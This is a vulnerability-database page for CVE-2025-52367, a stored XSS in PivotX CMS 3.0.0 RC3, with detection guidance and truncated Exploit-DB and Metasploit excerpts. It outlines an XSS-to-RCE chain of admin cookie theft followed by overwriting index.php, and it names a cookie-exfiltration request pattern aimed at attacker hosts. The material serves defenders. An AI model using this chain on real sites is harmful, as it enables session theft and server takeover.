CVE-2025-52367
published 2025-09-22CVE-2025-52367: Cross Site Scripting vulnerability in PivotX CMS v.3.0.0 RC 3 allows a remote attacker to execute arbitrary code via the subtitle field.
PriorityP335medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EXPLOIT
EPSS
4.25%
89.8th percentile
Cross Site Scripting vulnerability in PivotX CMS v.3.0.0 RC 3 allows a remote attacker to execute arbitrary code via the subtitle field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pivotx | pivotx | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests containing XSS payloads in the 'subtitle' or 'title' POST parameters targeting PivotX page creation endpoints (index.php?page=page). ↗
- →Alert on access to the PivotX file editor endpoint (index.php?page=homeexplore), especially from sessions that recently received stolen admin cookies, as this is the pivot point from XSS to RCE. ↗
- →Detect cookie-stealing XSS exfiltration pattern: outbound GET requests to attacker-controlled hosts with a query parameter named 'c' containing session cookie values (e.g., /bruh?c=<cookie>). ↗
- →Detect writes to the PivotX index.php file via the admin file editor, which is the final RCE step; monitor file modification events on the webroot index.php. ↗
- →The exploit chain requires only a normal (non-admin) authenticated user to initiate; alert on page creation requests from low-privilege accounts containing HTML/script tags in title or subtitle fields. ↗
- →The vulnerable code path is savePage() in modules/pages_flat.php using saveSerialize() with no sanitization; consider file integrity monitoring on this module file. ↗
- ·Only the 'body' and 'introduction' fields pass through TinyMCE HTML encoding; 'title' and 'subtitle' are rendered as raw HTML with no sanitization, making them the sole injectable attack surface. ↗
- ·The Metasploit module targets the admin file-edit feature to overwrite index.php; this RCE step requires valid admin credentials (obtained via the XSS cookie-theft step). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PivotX 3.0.0 RC3 - Remote Code Execution (RCE)
exploitdb·2025-07-16·CVSS 5.4
CVE-2025-52367 [MEDIUM] PivotX 3.0.0 RC3 - Remote Code Execution (RCE)
PivotX 3.0.0 RC3 - Remote Code Execution (RCE)
---
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367
## Vulnerability Type:
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
## Root Cause:
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
Only the 'body' and 'introduction' fields are pass
Metasploit
PivotX Remote Code Execution
metasploit
PivotX Remote Code Execution
PivotX Remote Code Execution
This module gains remote code execution in PivotX management system. The PivotX allows admin user to directly edit files on the webserver, including PHP files. The module exploits this by writing a malicious payload into `index.php` file, gaining remote code execution.
No writeups or analysis indexed.
2025-09-22
Published